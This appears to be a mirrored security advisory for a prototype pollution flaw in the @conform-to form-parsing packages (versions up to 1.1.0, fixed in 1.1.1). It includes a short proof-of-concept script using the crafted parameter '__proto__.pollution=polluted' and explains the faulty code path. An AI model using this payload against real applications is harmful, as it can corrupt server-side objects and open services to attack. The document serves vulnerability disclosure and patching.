Summary
Conform allows the parsing of nested objects in the form of object.property
. Due to an improper implementation of this feature, an attacker can exploit it to trigger prototype pollution by passing a crafted input to parseWith...
functions.
PoC
```javascript
const { parseWithZod } = require('@conform-to/zod');
const { z } = require("zod");
const param = new URLSearchParams("__proto__.pollution=polluted");
const schema = z.object({ "a": z.string() });
parseWithZod(param, { schema });
console.log("pollution:", ({}).pollution); // should print "polluted"
```
Details
The invocation of the parseWithZod
function in the above PoC triggers the setValue
function through getSubmissionContext
and parse
, executing the following process, resulting in prototype pollution:
```javascript
let pointer = value;
pointer.__proto__ = pointer.__proto__;
pointer = pointer.__proto__;
pointer.polluted = "polluted";
```
This is caused by the lack of object existence checking on line 117 in formdata.ts, where the code only checks for the presence of pointer[key]
without proper validation.
Impact
Applications that use conform for server-side validation of form data or URL parameters are affected by this vulnerability.
Package | Affected Version |
---|---|
![]() |
<= 1.1.0 |
![]() |
<= 1.1.0 |
![]() |
<= 1.1.0 |
Package | Fixed Version |
---|---|
![]() |
= 1.1.1 |
![]() |
= 1.1.1 |
![]() |
= 1.1.1 |
- ID
- NPM:GHSA-624G-8QJG-8QXF
- Severity
- high
- URL
- https://github.com/advisories/GHSA-624g-8qjg-8qxf
- Published
-
2024-04-23T21:15:55
(3 months ago) - Modified
-
2024-04-23T21:15:57
(3 months ago) - Rights
- NPM Security Team
Type | Package URL | Namespace | Name / Product | Version | Distribution / Platform | Arch | Patch / Fix |
---|---|---|---|---|---|---|---|
Affected | pkg:npm/%40conform-to/zod | @conform-to |
![]() |
<= 1.1.0 | |||
Fixed | pkg:npm/%40conform-to/zod | @conform-to |
![]() |
= 1.1.1 | |||
Affected | pkg:npm/%40conform-to/yup | @conform-to |
![]() |
<= 1.1.0 | |||
Fixed | pkg:npm/%40conform-to/yup | @conform-to |
![]() |
= 1.1.1 | |||
Affected | pkg:npm/%40conform-to/dom | @conform-to |
![]() |
<= 1.1.0 | |||
Fixed | pkg:npm/%40conform-to/dom | @conform-to |
![]() |
= 1.1.1 |
# CVE | Description | CVSS | EPSS | EPSS Trend (30 days) | Affected Products | Weaknesses | Security Advisories | Exploits | PoC | Pubblication Date | Modification Date |
---|---|---|---|---|---|---|---|---|---|---|---|
# CVE | Description | CVSS | EPSS | EPSS Trend (30 days) | Affected Products | Weaknesses | Security Advisories | PoC | Pubblication Date | Modification Date |